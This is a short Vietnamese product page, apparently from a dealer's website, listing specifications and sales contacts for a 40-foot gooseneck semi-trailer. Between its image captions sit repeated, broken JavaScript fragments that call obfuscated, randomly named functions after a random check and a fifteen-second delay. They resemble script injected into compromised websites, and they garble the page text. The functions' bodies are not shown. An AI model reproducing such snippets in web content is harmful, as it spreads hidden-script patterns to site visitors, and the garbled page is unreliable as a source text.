SƠMI-ROMOOC CỔ CÒ 40FEET

TONG THE CO CO MAU VANGTHÔNG SỐ KỸ THUẬT

Kích thước tổng thểmm12460 mm x 2480 mm x 1690 mm 
Tự trọngkg5.600
Tổng tải trọngkg38.000
Dầm chínhmm420
Hệ thống treoNhíp 8 lá
Trụckg3 x 13.000Fuwa
Hệ thống phanhPhanh hơi dây kép
Chân chốngkg28.000Fuwa
Vỏ11.00-20Double coin


andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}CHI TIET CO CO 40 FEET andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}PHIA SAU MOOC

andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}TONG THE CO CO MAU VANGLIÊN HỆ ĐỂ ĐẶT HÀNG

SPhòng kinh doanh somi-romooc  TRƯƠNG THANH  (0650) 3786561

Mr. Thanh: (090) 82 80 555    /         Mr. Trưởng : (090) 811 22 50